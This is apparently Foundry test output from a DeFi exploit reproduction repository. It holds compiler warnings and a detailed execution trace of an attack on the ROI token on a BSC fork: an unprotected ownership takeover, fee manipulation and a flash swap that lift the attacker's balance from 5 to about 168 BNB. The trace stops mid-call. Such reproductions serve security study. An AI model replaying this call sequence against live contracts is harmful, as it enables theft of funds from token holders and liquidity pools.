Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.25s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
   --> src/test/2022-09/ROI_exp.sol:116:26:
    |
116 |     function pancakeCall(address sender, uint256 amount0, uint256 amount1, bytes calldata data) public {
    |                          ^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
   --> src/test/2022-09/ROI_exp.sol:116:42:
    |
116 |     function pancakeCall(address sender, uint256 amount0, uint256 amount1, bytes calldata data) public {
    |                                          ^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
   --> src/test/2022-09/ROI_exp.sol:116:59:
    |
116 |     function pancakeCall(address sender, uint256 amount0, uint256 amount1, bytes calldata data) public {
    |                                                           ^^^^^^^^^^^^^^^


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 1.48s (6.00ms CPU time)

Ran 1 test for src/test/2022-09/ROI_exp.sol:Attacker
[PASS] testExploit() (gas: 2252828)
Logs:
  [Start] Attacker BNB Balance:: 5.000000000000000000
  ----------------------------------------------------
  Attacker swap some BNB to ROI for attack fund...
  Before [WBNB, BUSD, ROI] swap:
  	BNB balance of attacker:: 5.000000000000000000
  	ROI balance of attacker:: 0.000000000
  After [WBNB, BUSD, ROI] swap:
  	BNB balance of attacker:: 0.424772332854907415
  	ROI balance of attacker:: 111291.832999209
  ----------------------------------------------------
  Attacker sends all ROI to [BUSD/ROI Pair] but withholding 100,000 ROI
  ----------------------------------------------------
  Before flashloans from [BUSD/ROI Pair]
  	ROI balance of attacker:: 100000.000000000
  	BUSD balance of attacker:: 0.000000000000000000
  	ROI balance of BUSD/ROI Pair:: 4354304.525012632
  	BUSD balance of BUSD/ROI Pair:: 50844.234521281227427355
  After flashloans from [BUSD/ROI Pair]
  	ROI balance of attacker:: 0.000000000
  	BUSD balance of attacker:: 0.000000000000000000
  	ROI balance of BUSD/ROI Pair:: 4454304.525010763
  	BUSD balance of BUSD/ROI Pair:: 50844.234521281227427355
  ----------------------------------------------------
  [End] Attacker BNB Balance:: 168.331704163647122410

Traces:
  [7989] Attacker::setUp()
    ├─ [0] VM::createSelectFork("bsc", 21143795 [2.114e7])
    │   └─ ← [Return] 0
    ├─ [0] VM::deal(Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 5000000000000000000 [5e18])
    │   └─ ← [Return]
    ├─ [0] VM::label(ROI: [0xE48b75dc1b131fd3A8364b0580f76eFD04cF6e9c], "ROI")
    │   └─ ← [Return]
    ├─ [0] VM::label(BUSD: [0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56], "BUSD")
    │   └─ ← [Return]
    ├─ [0] VM::label(WBNB: [0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c], "WBNB")
    │   └─ ← [Return]
    ├─ [0] VM::label(PancakeRouter: [0x10ED43C718714eb63d5aA57B78B54704E256024E], "PancakeRouter")
    │   └─ ← [Return]
    ├─ [0] VM::label(BUSD/ROI Pair: [0x745D6Dd206906dd32b3f35E00533AD0963805124], "BUSD/ROI Pair")
    │   └─ ← [Return]
    └─ ← [Stop]

  [2389028] Attacker::testExploit()
    ├─ emit log_named_decimal_uint(key: "[Start] Attacker BNB Balance:", val: 5000000000000000000 [5e18], decimals: 18)
    ├─ [0] console::log("----------------------------------------------------") [staticcall]
    │   └─ ← [Stop]
    ├─ [0] console::log("Attacker swap some BNB to ROI for attack fund...") [staticcall]
    │   └─ ← [Stop]
    ├─ [0] console::log("Before [WBNB, BUSD, ROI] swap:") [staticcall]
    │   └─ ← [Stop]
    ├─ emit log_named_decimal_uint(key: "\tBNB balance of attacker:", val: 5000000000000000000 [5e18], decimals: 18)
    ├─ [12437] ROI::balanceOf(Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ emit log_named_decimal_uint(key: "\tROI balance of attacker:", val: 0, decimals: 9)
    ├─ [217537] PancakeRouter::swapETHForExactTokens{value: 5000000000000000000}(111291832999209 [1.112e14], [0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c, 0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56, 0xE48b75dc1b131fd3A8364b0580f76eFD04cF6e9c], Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1662613078 [1.662e9])
    │   ├─ [2893] BUSD/ROI Pair::getReserves() [staticcall]
    │   │   └─ ← [Return] 4454304525012626 [4.454e15], 49570775410399654775340 [4.957e22], 1662373335 [1.662e9]
    │   ├─ [2893] 0x58F876857a02D6762E0101bb5C46A8c1ED44Dc16::getReserves() [staticcall]
    │   │   └─ ← [Return] 334356898174835320818544 [3.343e23], 93298702958394889912628038 [9.329e25], 1662613078 [1.662e9]
    │   ├─ [23974] WBNB::deposit{value: 4575227667145092585}()
    │   │   ├─ emit Deposit(dst: PancakeRouter: [0x10ED43C718714eb63d5aA57B78B54704E256024E], wad: 4575227667145092585 [4.575e18])
    │   │   ├─  storage changes:
    │   │   │   @ 0x1fb4de8f865d751e0e8d9986066405ce08df416aff5fdd6299ad70c234250abc: 0 → 0x0000000000000000000000000000000000000000000000003f7e79529ab8ede9
    │   │   └─ ← [Stop]
    │   ├─ [8062] WBNB::transfer(0x58F876857a02D6762E0101bb5C46A8c1ED44Dc16, 4575227667145092585 [4.575e18])
    │   │   ├─ emit Transfer(from: PancakeRouter: [0x10ED43C718714eb63d5aA57B78B54704E256024E], to: 0x58F876857a02D6762E0101bb5C46A8c1ED44Dc16, value: 4575227667145092585 [4.575e18])
    │   │   ├─  storage changes:
    │   │   │   @ 0x1fb4de8f865d751e0e8d9986066405ce08df416aff5fdd6299ad70c234250abc: 0x0000000000000000000000000000000000000000000000003f7e79529ab8ede9 → 0
    │   │   │   @ 0xf1e03e4973193f89f2aa083d30a49755f07deae26a230485fdc9f8acee2c766f: 0x0000000000000000000000000000000000000000000046cd8615bf3e414e0b70 → 0x0000000000000000000000000000000000000000000046cdc5943890dc06f959
    │   │   └─ ← [Return] true
    │   ├─ [39264] 0x58F876857a02D6762E0101bb5C46A8c1ED44Dc16::swap(0, 1273459110881572652015 [1.273e21], BUSD/ROI Pair: [0x745D6Dd206906dd32b3f35E00533AD0963805124], 0x)
    │   │   ├─ [12871] BUSD::transfer(BUSD/ROI Pair: [0x745D6Dd206906dd32b3f35E00533AD0963805124], 1273459110881572652015 [1.273e21])
    │   │   │   ├─ emit Transfer(from: 0x58F876857a02D6762E0101bb5C46A8c1ED44Dc16, to: BUSD/ROI Pair: [0x745D6Dd206906dd32b3f35E00533AD0963805124], value: 1273459110881572652015 [1.273e21])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x3f78ef6f0a13ff5ebe2099feb686bb1e55bae2ea947609b08baac59bc1bf58b8: 0x0000000000000000000000000000000000000000004d2cc4d266a260bf42b346 → 0x0000000000000000000000000000000000000000004d2c7fc99b081b4e572f57
    │   │   │   │   @ 0x8807129717049b5cf8f3e4b04db574d1322eb46e5b63279e12e59026f7b70603: 0x000000000000000000000000000000000000000000000a7f3cb3de88c3d90a2c → 0x000000000000000000000000000000000000000000000ac4457f78ce34c48e1b
    │   │   │   └─ ← [Return] true
    │   │   ├─ [534] WBNB::balanceOf(0x58F876857a02D6762E0101bb5C46A8c1ED44Dc16) [staticcall]
    │   │   │   └─ ← [Return] 334361473402502465911129 [3.343e23]
    │   │   ├─ [531] BUSD::balanceOf(0x58F876857a02D6762E0101bb5C46A8c1ED44Dc16) [staticcall]
    │   │   │   └─ ← [Return] 93297429499284008339976023 [9.329e25]
    │   │   ├─ emit Sync(reserve0: 334361473402502465911129 [3.343e23], reserve1: 93297429499284008339976023 [9.329e25])
    │   │   ├─ emit Swap(sender: PancakeRouter: [0x10ED43C718714eb63d5aA57B78B54704E256024E], amount0In: 4575227667145092585 [4.575e18], amount1In: 0, amount0Out: 0, amount1Out: 1273459110881572652015 [1.273e21], to: BUSD/ROI Pair: [0x745D6Dd206906dd32b3f35E00533AD0963805124])
    │   │   ├─  storage changes:
    │   │   │   @ 8: 0x631976560000004d2cc4d266a260bf42b3460000000046cd8615bf3e414e0b70 → 0x631976560000004d2c7fc99b081b4e572f570000000046cdc5943890dc06f959
    │   │   └─ ← [Stop]
    │   ├─ [104949] BUSD/ROI Pair::swap(111291832999209 [1.112e14], 0, Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   │   ├─ [68669] ROI::transfer(Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 111291832999209 [1.112e14])
    │   │   │   ├─ emit Transfer(from: BUSD/ROI Pair: [0x745D6Dd206906dd32b3f35E00533AD0963805124], to: Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 111291832999209 [1.112e14])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x9a37937c0ede8c307bf0496ec60e131422d44420befc187978dc5326d56d38a4: 0 → 0x0091df484af571998bf45e055eb6aaf1621ac8339a234d082a2cb9722199345c
    │   │   │   │   @ 0x98f72c8a354d944d4283a924edb4088c47a087ea890af94eb300c0feab466742: 0x16ce562e242929a5fac02fee092bb26018dfd24e03eb03323dd6b0ed914e05d6 → 0x163c76e5d933b80c6ecbd1e8aa75076eb6c50a1a69c7b62a13a9f77b6fb4d17a
    │   │   │   └─ ← [Return] true
    │   │   ├─ [2437] ROI::balanceOf(BUSD/ROI Pair: [0x745D6Dd206906dd32b3f35E00533AD0963805124]) [staticcall]
    │   │   │   └─ ← [Return] 4343012692013417 [4.343e15]
    │   │   ├─ [531] BUSD::balanceOf(BUSD/ROI Pair: [0x745D6Dd206906dd32b3f35E00533AD0963805124]) [staticcall]
    │   │   │   └─ ← [Return] 50844234521281227427355 [5.084e22]
    │   │   ├─ emit Sync(reserve0: 4343012692013417 [4.343e15], reserve1: 50844234521281227427355 [5.084e22])
    │   │   ├─ emit Swap(sender: PancakeRouter: [0x10ED43C718714eb63d5aA57B78B54704E256024E], amount0In: 0, amount1In: 1273459110881572652015 [1.273e21], amount0Out: 111291832999209 [1.112e14], amount1Out: 0, to: Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   ├─  storage changes:
    │   │   │   @ 9: 0x00000000000000000000000084df8a470a63578caf27cfb7111d0760e363f608 → 0x000000000000000000000000874cbda2fe516422a6eebf3f2f0a4f4b7989262d
    │   │   │   @ 10: 0x000000000000000000000000000000000000e12eb6ac59609e5817392df2a50d → 0x000000000000000000000000000000000000e6b289332156251eb881bc690a51
    │   │   │   @ 8: 0x6315cdd7000000000a7f3cb3de88c3d90a2c000000000000000fd32a96ef4e92 → 0x63197656000000000ac4457f78ce34c48e1b000000000000000f6df270c33169
    │   │   └─ ← [Stop]
    │   ├─ [55] Attacker::receive{value: 424772332854907415}()
    │   │   └─ ← [Stop]
    │   └─ ← [Return] [4575227667145092585 [4.575e18], 1273459110881572652015 [1.273e21], 111291832999209 [1.112e14]]
    ├─ [0] console::log("After [WBNB, BUSD, ROI] swap:") [staticcall]
    │   └─ ← [Stop]
    ├─ emit log_named_decimal_uint(key: "\tBNB balance of attacker:", val: 424772332854907415 [4.247e17], decimals: 18)
    ├─ [2437] ROI::balanceOf(Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 111291832999209 [1.112e14]
    ├─ emit log_named_decimal_uint(key: "\tROI balance of attacker:", val: 111291832999209 [1.112e14], decimals: 9)
    ├─ [0] console::log("----------------------------------------------------") [staticcall]
    │   └─ ← [Stop]
    ├─ [5219] ROI::transferOwnership(Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   ├─ emit OwnershipTransferred(previousOwner: 0x231aADf45C93f41CEE2e0F8938bEB62a14ECb892, newOwner: Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   ├─  storage changes:
    │   │   @ 0: 0x000000000000000000000000231aadf45c93f41cee2e0f8938beb62a14ecb892 → 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496
    │   └─ ← [Stop]
    ├─ [556] ROI::setTaxFeePercent(0)
    │   └─ ← [Stop]
    ├─ [4975] ROI::setBuyFee(0, 0)
    │   └─ ← [Stop]
    ├─ [4954] ROI::setSellFee(0, 0)
    │   └─ ← [Stop]
    ├─ [576] ROI::setLiquidityFeePercent(0)
    │   └─ ← [Stop]
    ├─ [91439] ROI::excludeFromReward(0x575e2Cd07E4d6CCBcA708D64b4ba45521A2C0722)
    │   ├─  storage changes:
    │   │   @ 0x6e1540171b6c0c960b71a7020d9f60077f6af931a8bbf590da0223dacf75c7af: 0 → 0x000000000000000000000000575e2cd07e4d6ccbca708d64b4ba45521a2c0722
    │   │   @ 0x7e5762da6466648e4fe2e4d5c40096ee2be78c29ead6cf93b40b20cee542ce15: 0 → 1
    │   │   @ 9: 0 → 1
    │   │   @ 0xcb8d737687c3a09a9eee115d7f31a3f88e77fd659eb1b3cb94fae9e8d67f6190: 0 → 0x00000000000000000000000000000000000000000000000000a11da2882f806c
    │   └─ ← [Stop]
    ├─ [74292] ROI::excludeFromReward(0x216FC1D66677c9A778C60E6825189508b9619908)
    │   ├─  storage changes:
    │   │   @ 0xc68bb61781d8bcb007542efc37072520e6456f20af3a8706be943756057f35f3: 0 → 0x0000000000000000000000000000000000000000000000000000886ca0d5da6a
    │   │   @ 0x6e1540171b6c0c960b71a7020d9f60077f6af931a8bbf590da0223dacf75c7b0: 0 → 0x000000000000000000000000216fc1d66677c9a778c60e6825189508b9619908
    │   │   @ 9: 1 → 2
    │   │   @ 0x54c18f5c7c5da01126d352fcd0c6a5e7e45cbfc717fd8bbbebdb6d80c29489f2: 0 → 1
    │   └─ ← [Stop]
    ├─ [77045] ROI::excludeFromReward(0x61708418F929f264Edd312aDC7089eB9d69cEd9C)
    │   ├─  storage changes:
    │   │   @ 0xfb08acaaa89ddeefbc08b44162858d4119b100d3aeb41e45caaf45f07b2c031d: 0 → 0x000000000000000000000000000000000000000000000000000028e2603a3a97
    │   │   @ 0x93f13a3184092c260befb5100f26aa6f32e2ab6e5338f2c60d42ad7476f2f45f: 0 → 1
    │   │   @ 9: 2 → 3
    │   │   @ 0x6e1540171b6c0c960b71a7020d9f60077f6af931a8bbf590da0223dacf75c7b1: 0 → 0x00000000000000000000000061708418f929f264edd312adc7089eb9d69ced9c
    │   └─ ← [Stop]
    ├─ [79798] ROI::excludeFromReward(0xC81DC8F793415B80d7Ee604e936B79D85BD771B6)
    │   ├─  storage changes:
    │   │   @ 0xef355c93b523730ba5a3a828f59cf10dc62bf3d32ad92f9d4bb936609e250e1c: 0 → 1
    │   │   @ 9: 3 → 4
    │   │   @ 0xa7a5389a0d82b1232ab30f67b8f3e6ef6f7b8987a76f086b3ad67ed0d43692f0: 0 → 0x0000000000000000000000000000000000000000000000000000004271d528c8
    │   │   @ 0x6e1540171b6c0c960b71a7020d9f60077f6af931a8bbf590da0223dacf75c7b2: 0 → 0x000000000000000000000000c81dc8f793415b80d7ee604e936b79d85bd771b6
    │   └─ ← [Stop]
    ├─ [82552] ROI::excludeFromReward(0x19af64CFB666d7Df8C69F884CDf5d42c0e1F9D0C)
    │   ├─  storage changes:
    │   │   @ 0x928ea3a0d602b55a07660674e9bbd543c027a707e03d5e8e8b8c903e908cffd4: 0 → 1
    │   │   @ 9: 4 → 5
    │   │   @ 0x14b2ed32e869b9498610102b7927d3bb69f16caa0f48a47ff7ae6745c73dc991: 0 → 0x00000000000000000000000000000000000000000000000000000028fa6e36d1
    │   │   @ 0x6e1540171b6c0c960b71a7020d9f60077f6af931a8bbf590da0223dacf75c7b3: 0 → 0x00000000000000000000000019af64cfb666d7df8c69f884cdf5d42c0e1f9d0c
    │   └─ ← [Stop]
    ├─ [85305] ROI::excludeFromReward(0xA982444d884e00C7dFBBCB90e7a705E567853d0E)
    │   ├─  storage changes:
    │   │   @ 0x9043c02f44bc21e5f1fc03d045f06857578be792b4727d2b9b66f092c91c536d: 0 → 0x00000000000000000000000000000000000000000000000000000004e69437e9
    │   │   @ 0x54bcb3f237c7fd6c9ecd6b0c2d4cfb192088579d6c284cb4d8b72adac0efcafd: 0 → 1
    │   │   @ 0x6e1540171b6c0c960b71a7020d9f60077f6af931a8bbf590da0223dacf75c7b4: 0 → 0x000000000000000000000000a982444d884e00c7dfbbcb90e7a705e567853d0e
    │   │   @ 9: 5 → 6
    │   └─ ← [Stop]
    ├─ [88059] ROI::excludeFromReward(0x899045B0B52d55Be0210A1046a01B99C78E44540)
    │   ├─  storage changes:
    │   │   @ 0x9680ca2069c5d4072a181ace2a3bb934790e39468d821056208647c9b05c0770: 0 → 0x00000000000000000000000000000000000000000000000000000000e27f737a
    │   │   @ 0x6e1540171b6c0c960b71a7020d9f60077f6af931a8bbf590da0223dacf75c7b5: 0 → 0x000000000000000000000000899045b0b52d55be0210a1046a01b99c78e44540
    │   │   @ 9: 6 → 7
    │   │   @ 0xd32a048f4a92d32fd5abd2b6474b559e40b217d0b8a798a5d4c74fd82ae412d9: 0 → 1
    │   └─ ← [Stop]
    ├─ [90812] ROI::excludeFromReward(0xDdda7b2D1B9EbafD37c434b90a09fca6d014682F)
    │   ├─  storage changes:
    │   │   @ 0xf245655b9b8d26ffbea38f5e5838b163bf335a69b31b0912cf548abffb66b410: 0 → 1
    │   │   @ 0xffa5e003784844ee3515294b714aca867bda295bf6ccd09ab1289f3526486422: 0 → 0x000000000000000000000000000000000000000000000000000000004a8180ef
    │   │   @ 9: 7 → 8
    │   │   @ 0x6e1540171b6c0c960b71a7020d9f60077f6af931a8bbf590da0223dacf75c7b6: 0 → 0x000000000000000000000000ddda7b2d1b9ebafd37c434b90a09fca6d014682f
    │   └─ ← [Stop]
    ├─ [93566] ROI::excludeFromReward(0xf3C7107024e4935FbFd9f665cF5321146DfBD9a8)
    │   ├─  storage changes:
    │   │   @ 0x649600b02a59964eb4fec41f483f06db70b1bb0e4f0475bf4b2cdc57a3f83ef2: 0 → 0x000000000000000000000000000000000000000000000000000000003b9acb1d
    │   │   @ 0xd1aeca78cf66ee9dec4b311457afe3e43ceb4e893438c2e8caeaf461ff05dfaf: 0 → 1
    │   │   @ 0x6e1540171b6c0c960b71a7020d9f60077f6af931a8bbf590da0223dacf75c7b7: 0 → 0x000000000000000000000000f3c7107024e4935fbfd9f665cf5321146dfbd9a8
    │   │   @ 9: 8 → 9
    │   └─ ← [Stop]
    ├─ [96320] ROI::excludeFromReward(0x6f84160a01f3D4005eB50582d14F17B72575A80A)
    │   ├─  storage changes:
    │   │   @ 0x0cd36af47e1889a0bfb693a8f46c105db0a5355e5c8de4bd645686ee7f4a5f54: 0 → 0x00000000000000000000000000000000000000000000000000000000046c3bed
    │   │   @ 0x5b92b8779c771e91b81d02862934ff938199de5e69acccd8d815273f42e735dc: 0 → 1
    │   │   @ 9: 9 → 10
    │   │   @ 0x6e1540171b6c0c960b71a7020d9f60077f6af931a8bbf590da0223dacf75c7b8: 0 → 0x0000000000000000000000006f84160a01f3d4005eb50582d14f17b72575a80a
    │   └─ ← [Stop]
    ├─ [99073] ROI::excludeFromReward(0x143B8568B1ef2F22f3A67229E80DCF0e6fe9bf96)
    │   ├─  storage changes:
    │   │   @ 0xe75a4d113e5a43dec9670998ec1fd38f91bcc103aaf6b49ca28e494c04e45e8d: 0 → 0x000000000000000000000000000000000000000000000000000000000285affe
    │   │   @ 0x67da7fb6767042a9ea78807ca2e7e72d52a9e067cb389562d6fdbfe4eac8ffd5: 0 → 1
    │   │   @ 9: 10 → 11
    │   │   @ 0x6e1540171b6c0c960b71a7020d9f60077f6af931a8bbf590da0223dacf75c7b9: 0 → 0x000000000000000000000000143b8568b1ef2f22f3a67229e80dcf0e6fe9bf96
    │   └─ ← [Stop]
    ├─ [101827] ROI::excludeFromReward(0x16A31000295d1846F16B8F1aee3AeDC6b2cB730b)
    │   ├─  storage changes:
    │   │   @ 0x724692d794070f61c7c2149a411e2e0578ce7934acdcc90223731ba2a212fd76: 0 → 0x0000000000000000000000000000000000000000000000000000000001efa6da
    │   │   @ 0x6e1540171b6c0c960b71a7020d9f60077f6af931a8bbf590da0223dacf75c7ba: 0 → 0x00000000000000000000000016a31000295d1846f16b8f1aee3aedc6b2cb730b
    │   │   @ 9: 11 → 12
    │   │   @ 0x6df383650a9f1e75002e1da0e5de6c98da36404dd2a54635b26077c9744829c0: 0 → 1
    │   └─ ← [Stop]
    ├─ [100581] ROI::excludeFromReward(ROI: [0xE48b75dc1b131fd3A8364b0580f76eFD04cF6e9c])
    │   ├─  storage changes:
    │   │   @ 9: 12 → 13
    │   │   @ 0x06c4ffc4f160b6e720c32373cd9e5a6935437eaf5b39908c57900e72ff0c9098: 0 → 0x0000000000000000000000000000000000000000000000000000002e4a413229
    │   │   @ 0xe130d758ba9ff9557086ae753691df214d2f116bc6b435b9fa2170ef30da09dd: 0 → 1
    │   │   @ 0x6e1540171b6c0c960b71a7020d9f60077f6af931a8bbf590da0223dacf75c7bb: 0 → 0x000000000000000000000000e48b75dc1b131fd3a8364b0580f76efd04cf6e9c
    │   └─ ← [Stop]
    ├─ [103335] ROI::excludeFromReward(Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   ├─  storage changes:
    │   │   @ 0x3707462b181da5757afb393000713f9d89955f52c38cceeebf01e0b050d6ff3e: 0 → 1
    │   │   @ 0x6e1540171b6c0c960b71a7020d9f60077f6af931a8bbf590da0223dacf75c7bc: 0 → 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496
    │   │   @ 0xcbca2c2e1a1577eb2e25b9dce980a2cead88d4a5422449a454760a1d38d5b82a: 0 → 0x00000000000000000000000000000000000000000000000000006538262c1d29
    │   │   @ 9: 13 → 14
    │   └─ ← [Stop]
    ├─ [0] console::log("Attacker sends all ROI to [BUSD/ROI Pair] but withholding 100,000 ROI") [staticcall]
    │   └─ ← [Stop]
    ├─ [870] ROI::balanceOf(Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 111291832999209 [1.112e14]
    ├─ [91902] ROI::transfer(BUSD/ROI Pair: [0x745D6Dd206906dd32b3f35E00533AD0963805124], 11291832999209 [1.129e13])
    │   ├─ emit Transfer(from: Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: BUSD/ROI Pair: [0x745D6Dd206906dd32b3f35E00533AD0963805124], value: 11291832999209 [1.129e13])
    │   ├─  storage changes:
    │   │   @ 0x9a37937c0ede8c307bf0496ec60e131422d44420befc187978dc5326d56d38a4: 0x0091df484af571998bf45e055eb6aaf1621ac8339a234d082a2cb9722199345c → 0x00831260c8800db146dbc061af13310a0b698c2c1f9882b7e79f6759085140d8
    │   │   @ 0xcbca2c2e1a1577eb2e25b9dce980a2cead88d4a5422449a454760a1d38d5b82a: 0x00000000000000000000000000000000000000000000000000006538262c1d29 → 0x00000000000000000000000000000000000000000000000000005af3107a4000
    │   │   @ 0x98f72c8a354d944d4283a924edb4088c47a087ea890af94eb300c0feab466742: 0x163c76e5d933b80c6ecbd1e8aa75076eb6c50a1a69c7b62a13a9f77b6fb4d17a → 0x164b43cd5ba91bf4b3e46f8c5a1881560d764621e452807a5637499488fcc4fe
    │   └─ ← [Return] true
    ├─ [0] console::log("----------------------------------------------------") [staticcall]
    │   └─ ← [Stop]
    ├─ [0] console::log("Before flashloans from [BUSD/ROI Pair]") [staticcall]
    │   └─ ← [Stop]
    ├─ [870] ROI::balanceOf(Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 100000000000000 [1e14]
    ├─ emit log_named_decimal_uint(key: "\tROI balance of attacker:", val: 100000000000000 [1e14], decimals: 9)
    ├─ [2531] BUSD::balanceOf(Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ emit log_named_decimal_uint(key: "\tBUSD balance of attacker:", val: 0, decimals: 18)
    ├─ [40987] ROI::balanceOf(BUSD/ROI Pair: [0x745D6Dd206906dd32b3f35E00533AD0963805124]) [staticcall]
    │   └─ ← [Return] 4354304525012632 [4.354e15]
    ├─ emit log_named_decimal_uint(key: "\tROI balance of BUSD/ROI Pair:", val: 4354304525012632 [4.354e15], decimals: 9)
    ├─ [531] BUSD::balanceOf(BUSD/ROI Pair: [0x745D6Dd206906dd32b3f35E00533AD0963805124]) [staticcall]
    │   └─ ← [Return] 50844234521281227427355 [5.084e22]
    ├─ emit log_named_decimal_uint(key: "\tBUSD balance of BUSD/ROI Pair:", val: 50844234521281227427355 [5.084e22], decimals: 18)
    ├─ [20456] ROI::setTaxFeePercent(99)
    │   ├─  storage changes:
    │   │   @ 16: 0 → 99
    │   └─ ← [Stop]
    ├─ [249923] BUSD/ROI Pair::swap(4343012692003417 [4.343e15], 0, Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x33303330)
    │   ├─ [97957] ROI::transfer(Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 4343012692003417 [4.343e15])
    │   │   ├─ emit Transfer(from: BUSD/ROI Pair: [0x745D6Dd206906dd32b3f35E00533AD0963805124], to: Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 43430126920035 [4.343e13])
    │   │   ├─  storage changes:
    │   │   │   @ 11: 0xffffe5079a1ab290b456746382d1563b8a5d20e4a07b7e9acfd24db05adaa415 → 0xe9fc5ad740bb6d5efaf1ad8d95c8556ba8da88bbd3ffe88864e185c973d146fd
    │   │   │   @ 0x9a37937c0ede8c307bf0496ec60e131422d44420befc187978dc5326d56d38a4: 0x00831260c8800db146dbc061af13310a0b698c2c1f9882b7e79f6759085140d8 → 0x00bbff16481c2c0b4a248d5b407328c77b9d17a38c8a445dec595f02d60ba604
    │   │   │   @ 12: 0x00000000000000000000000000000000000000000000000000000012b6e44784 → 0x000000000000000000000000000000000000000000000000000f46854a5db07a
    │   │   │   @ 0x98f72c8a354d944d4283a924edb4088c47a087ea890af94eb300c0feab466742: 0x164b43cd5ba91bf4b3e46f8c5a1881560d764621e452807a5637499488fcc4fe → 0x000ecce782adb868f736dbbcdbaf88c8bbc02281aae528c1e68c8a03d43902ba
    │   │   │   @ 0xcbca2c2e1a1577eb2e25b9dce980a2cead88d4a5422449a454760a1d38d5b82a: 0x00000000000000000000000000000000000000000000000000005af3107a4000 → 0x00000000000000000000000000000000000000000000000000008272edc3e163
    │   │   └─ ← [Return] true
    │   ├─ [95877] Attacker::pancakeCall(Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 4343012692003417 [4.343e15], 0, 0x33303330)
    │   │   ├─ [870] ROI::balanceOf(Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 143430126920035 [1.434e14]
